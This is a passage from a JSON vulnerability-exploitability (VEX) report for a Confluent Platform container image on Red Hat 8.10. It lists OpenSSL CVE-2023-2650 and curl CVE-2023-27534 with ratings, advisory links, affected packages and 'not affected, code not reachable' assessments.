          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-2650",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or\ndata containing them may be very slow.\n\nImpact summary: Applications that use OBJ_obj2txt() directly, or use any of\nthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message\nsize limit may experience notable to very long delays when processing those\nmessages, which may lead to a Denial of Service.\n\nAn OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -\nmost of which have no size limit.  OBJ_obj2txt() may be used to translate\nan ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL\ntype ASN1_OBJECT) to its canonical numeric text form, which are the\nsub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by\nperiods.\n\nWhen one of the sub-identifiers in the OBJECT IDENTIFIER is very large\n(these are sizes that are seen as absurdly large, taking up tens or hundreds\nof KiBs), the translation to a decimal number in text may take a very long\ntime.  The time complexity is O(n^2) with 'n' being the size of the\nsub-identifiers in bytes (*).\n\nWith OpenSSL 3.0, support to fetch cryptographic algorithms using names /\nidentifiers in string form was introduced.  This includes using OBJECT\nIDENTIFIERs in canonical numeric text form as identifiers for fetching\nalgorithms.\n\nSuch OBJECT IDENTIFIERs may be received through the ASN.1 structure\nAlgorithmIdentifier, which is commonly used in multiple protocols to specify\nwhat cryptographic algorithm should be used to sign or verify, encrypt or\ndecrypt, or digest passed data.\n\nApplications that call OBJ_obj2txt() directly with untrusted data are\naffected, with any version of OpenSSL.  If the use is for the mere purpose\nof display, the severity is considered low.\n\nIn OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,\nCMS, CMP/CRMF or TS.  It also impacts anything that processes X.509\ncertificates, including simple things like verifying its signature.\n\nThe impact on TLS is relatively low, because all versions of OpenSSL have a\n100KiB limit on the peer's certificate chain.  Additionally, this only\nimpacts clients, or servers that have explicitly enabled client\nauthentication.\n\nIn OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,\nsuch as X.509 certificates.  This is assumed to not happen in such a way\nthat it would cause a Denial of Service, so these versions are considered\nnot affected by this issue in such a way that it would be cause for concern,\nand the severity is therefore considered low.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-2650"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/05/30/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:6330"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-2650"
        },
        {
          "url": "https://bugzilla.redhat.com/1858038"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-6330.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a"
        },
        {
          "url": "https://github.com/advisories/GHSA-gqxg-9vfr-p9cg"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-2650.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-6330.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650"
        },
        {
          "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230703-0001/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231027-0009/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6119-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6188-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6672-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230530.txt"
        }
      ],
      "published": "2023-05-30T14:15:09+00:00",
      "updated": "2026-06-17T05:53:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-27534",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A path traversal vulnerability exists in curl <8.0.0 SFTP implementation causes the tilde (~) character to be wrongly replaced when used as a prefix in the first path element, in addition to its intended use as the first element to indicate a path relative to the user's home directory. Attackers can exploit this flaw to bypass filtering or execute arbitrary code by crafting a path like /~2/foo while accessing a server with a specific user.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-27534"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:6679"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-27534"
        },
        {
          "url": "https://bugzilla.redhat.com/2179062"
        },
        {
          "url": "https://bugzilla.redhat.com/2179069"
        },
        {
          "url": "https://bugzilla.redhat.com/2179092"
        },
        {
          "url": "https://bugzilla.redhat.com/2179103"
        },
        {
          "url": "https://curl.se/docs/CVE-2023-27534.html"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-6679.html"
        },
        {
          "url": "https://hackerone.com/reports/1892351"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-27534.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-6679.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00016.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36NBD5YLJXXEDZLDGNFCERWRYJQ6LAQW/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27534"
        },
        {
          "url": "https://security.gentoo.org/glsa/202310-12"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230420-0012/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5964-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-27534"
        }
      ],
      "published": "2023-03-30T20:15:07+00:00",
      "updated": "2026-06-17T05:45:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
